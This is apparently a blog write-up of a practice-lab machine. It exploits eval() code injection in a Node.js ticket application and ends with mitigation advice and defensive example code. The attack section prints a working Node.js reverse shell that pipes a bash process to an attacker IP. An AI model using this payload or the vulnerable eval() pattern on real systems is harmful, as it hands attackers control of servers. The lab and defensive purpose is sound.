WEB SECURITY — CODE EXECUTION

Eval("console.log('RCE Warning')")

Nairuz Abulhul, published in R3d Buck3T
5 min read · Oct 31, 2021

Remote Code Execution in Node.js using the Eval function — Dibble HTB machine


eval() is a JavaScript function that takes a string and executes it as code at run time, either in the browser or on the back-end server.

Because of this capability, an attacker who controls the string passed to eval() can send malicious payloads to the application's back-end and have it carry out arbitrary operations, such as reading and writing files or opening network connections (reverse shells), with the same permissions as the running web service, potentially giving the attacker control of the entire server.

Today, we will test a vulnerable NodeJS application that uses the notorious eval function and compromise the server. The steps will be demonstrated on the Dibble machine on Offensive Security — Proving Grounds.

🔍$_Enumeration_Phase

Whenever I start looking into a web application, I first browse through it as a regular user, taking notes on the side of any interesting endpoints or unusual behavior the application displays.

In this case, we have a ticket management application written in NodeJS that tracks incidents and technical issues for a company's internal users. I am familiar with the common NodeJS vulnerability classes, such as command injection and insecure deserialization, so when I started looking into the application I kept those on my list to check in depth.

After registering as a user, I came across the /logs endpoint, which allows the user to create new tickets. I created one as a regular user and intercepted the request with Burp Suite's proxy.

I noticed four interesting parameters: the connect.sid cookie, userLevel (which carries a base64 value), username, and msg.

(screenshot: posting logs)

I started fuzzing the parameters with special characters and found that the application HTML-encodes them correctly in the response, so no dice there.

(screenshot: encoded HTML in the response)

Then I tried passing encoded arithmetic expressions such as 1+1 in the parameters to see whether the application would evaluate them.

As the screenshot below shows, the application evaluated the input in the msg parameter. From this we can infer that the application is vulnerable to a code injection attack😈.

🔥$_Attack_Demo

Now that we have identified that the application executes JavaScript code on the back-end, it is time to weaponize it. We will use a NodeJS reverse shell and see if we get a connection back to our machine.

The code below defines an immediately invoked function that loads Node's built-in child_process module with require(), which lets it create child processes of the main Node.js process.

It then calls spawn() to start a new process; in our case that is a bash shell running as a child of the Node.js process.

Finally, it opens a TCP connection to the IP address and port of the attacking machine, pipes the data arriving on the socket into the shell's stdin, and pipes the shell's stdout and stderr back out over the socket.

```javascript
(function () {
  // Load the net and child_process modules and spawn a bash shell as a child process
  var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/bash", []);
  var client = new net.Socket();

  // create connection to the attacking machine
  client.connect(80, "192.168.49.243", function () {
    client.pipe(sh.stdin);     // socket input -> shell stdin
    sh.stdout.pipe(client);    // shell stdout -> socket
    sh.stderr.pipe(client);    // shell stderr -> socket
  });
  return /a/;
})();
```

I URL encoded the shell and sent the request to the application.

(screenshot: netcat shell)

Great, it looks like there are no sandboxing controls in place: the code executed successfully and we got a shell.

$_Mitigation

Things to keep in mind to avoid code injections in NodeJS:

  • Always validate user input on the server side before processing it.
  • Sanitize characters that are used in command injections: & ; ' \ " | * ? ~ < > ^ ( ) [ ] { }
  • Do not use the eval() function; there are safer alternatives.
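To make these points concrete, here is an added example (not code from the post or from the Dibble application) that models the ticket's msg parameter: the eval()-based handler that makes "1+1" come back evaluated, next to a hardened handler that validates the input and treats it strictly as data, plus a small heuristic for logging submissions that look like code-injection probes. The function names, length limit and patterns are assumptions made for this example.

```javascript
// VULNERABLE pattern: the message is evaluated as JavaScript, so any string the
// user controls becomes code running with the web service's privileges.
function renderMessageUnsafe(msg) {
  return String(eval(msg)); // "1+1" -> "2"; a require('child_process') payload would run
}

// Escape HTML metacharacters so the stored message is displayed, never interpreted.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

const MAX_MSG_LEN = 500; // assumed limit for a ticket message

// HARDENED pattern: validate on the server, keep the text as data, never evaluate it.
// Once input is never passed to eval() or a shell, characters such as ( ) and ;
// are harmless as data; they only need output encoding when rendered.
// Returns { ok: true, value } or { ok: false, reason }.
function renderMessageSafe(msg) {
  if (typeof msg !== "string") return { ok: false, reason: "msg must be a string" };
  if (msg.length === 0 || msg.length > MAX_MSG_LEN) return { ok: false, reason: "bad length" };
  // Allowlist printable ASCII plus common whitespace; reject control characters.
  if (/[^\x20-\x7E\r\n\t]/.test(msg)) return { ok: false, reason: "non-printable input" };
  return { ok: true, value: escapeHtml(msg) };
}

// Detection aid (heuristic, constructed for this example): flag submissions that
// resemble Node.js code-injection probes so the ticket system can log or alert on them.
const SUSPICIOUS_PATTERNS = [
  /\brequire\s*\(/i,
  /child_process/i,
  /\.spawn\s*\(/i,
  /\bnew\s+net\.Socket\b/i,
  /\bprocess\.env\b/i,
];
function looksLikeCodeInjection(msg) {
  return SUSPICIOUS_PATTERNS.some((re) => re.test(msg));
}

// Demo run: the unsafe handler evaluates arithmetic; the safe one stores it as text.
console.log(renderMessageUnsafe("1+1"));            // 2
console.log(renderMessageSafe("1+1"));              // { ok: true, value: '1+1' }
console.log(looksLikeCodeInjection('require("child_process")')); // true
```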

That's all for today. Thanks for reading!!

🔔 All of the used commands can be found at R3d-Buck3T — Notion (Web Application Testing — NodeJS)
